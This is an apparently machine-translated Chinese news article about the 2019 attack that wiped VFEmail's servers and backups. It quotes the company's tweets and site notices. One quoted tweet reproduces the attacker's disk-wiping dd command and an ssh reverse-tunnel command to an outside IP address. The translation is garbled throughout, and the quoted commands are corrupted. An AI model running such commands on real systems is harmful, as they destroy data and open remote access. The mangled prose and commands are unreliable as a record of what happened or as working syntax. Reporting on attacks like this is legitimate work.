一个名为vfemail的电子邮件服务基本上是开业在黑客试图删除所有在(和)视线之外的东西之后。
“是的,@vfemail有效消失。它可能不会返回。我从来没有想过任何人会关心我的爱情,那么他们想要完全和彻底摧毁它。“
这不是“只是”一个简单网页妥协,或某种数据库转储。事实上,它完全更糟糕了。简而言之,整个服务的彻底歼灭,大多数,如果不是全部,其基础设施。
发生了什么?
vfemail的用户在服务网站上唤醒了以下消息:
点击放大
!!!警报!!!!2019年2月11日更新
Vfemail (dot)net和mail(dot) Vfemail (dot)net目前不可用。
我们在黑客手中遭受了灾难性的破坏,最后被视为AKTV [删除]
这个人破坏了美国所有的数据,包括主系统和备份系统。我们正在努力尽可能地恢复数据。
新更新2/11/19 6PM CST:
收到的邮件正在投递。
Webmail了。注册邮箱是在新邮件交付时创建的。如果您无法登录,您可能没有收到邮件。
邮箱是新的,没有子文件夹。
没有过滤器。如果你创建了一个过滤器与部落,登录到部落,创建任何文件夹,你需要。
点击过滤,点击脚本,然后点击“激活脚本”。
此时没有垃圾邮件扫描-收到的邮件可能是垃圾邮件扫描取决于DNS状态。
免费用户不应该尝试发送电子邮件,目前没有免费账户的交付机制。付费账户应该可用,包括Horde/Roundcube的联系人和日历。
此时,我不确定美国用户的现有邮件的状态。如果您有自己的电子邮件客户端,请不要尝试使其工作。
如果将客户重新连接到新邮箱,则所有本地邮件将丢失。
哎哟。
他们在社交媒体上说出来吗?
当然了,这些推文读起来并不愉快:
这看起来不妙。在多个数据中心的所有外部系统,包括不同的操作系统和远程身份验证,都出现故障。
——VFEmail.net (@VFEmail)2019年2月11日
在格式化备份服务器的中间捕获了Perp:
DD if = / dev / zers = / dev / da0 bs = 4194304 seek = 1024 count = 399559
via:ssh -v -oStricthostKeychecking = noogogollevel = error-outerknownhostsfile = / dev / null aktv@94.155.49.9 -r 127.0.0.1:30081:127.0.0.1:22-n——VFEmail.net (@VFEmail)2019年2月11日
它可能听起来有点令人兴奋地走在犯罪现场,但我可以向你保证,它只涉及许多“哦”类型的表达。如果他们已经擦拭了备份,那么游戏确实结束了。
他们恢复过吗?
遗憾的是,情况并没有好转,几个小时后,完整的损坏报告出来了:
此时,攻击者已在每个服务器上格式化所有磁盘。每个VM都丢失了。每个文件服务器都丢失,每个备份服务器都丢失了。nl为100%托管,具有较小的数据集。提供者的NL备份完好无损,并且服务应该在那里。
——VFEmail.net (@VFEmail)2019年2月11日
所有数据至少加密,但是当擦洗时,所述数据基本上消失在薄空气中:
是的,但没关系。他们只是格式化了所有内容。
——VFEmail.net (@VFEmail)2019年2月11日
他们还设法使用不同形式的身份验证摧毁了各种vm。
奇怪的是,并非所有VM都共享相同的身份验证,但均被销毁。这是通过SSH利用的多密码,并且没有赎金。只是攻击和毁灭。
——VFEmail.net (@VFEmail)2019年2月11日
“只是攻击和摧毁”
过去,服务和网站遭到过严重的攻击,有些甚至被摧毁。然而,几乎总是有一个公开的理由,或赎金,或其他一些线索。
在这里,自2001年以来一直是完全毁灭性,并且在讨价还价中毁坏了现有的服务。没有迹象表明它们如何进入,或者如果重要的系统没有多因素身份验证。一些评论员提出了建议这个缺陷可能是攻击者的方式。
在发布详细分析之前,很难说为什么会发生这种情况。该服务的所有者是否加剧了一个有才华横溢的黑客?或者,这些服务用户可能引起了不需要的来源的关注,这是最终结果?找出令人着迷。但是,如果您操作类似的服务,则可能希望在此期间考虑一个体面的离线备份系统。
评论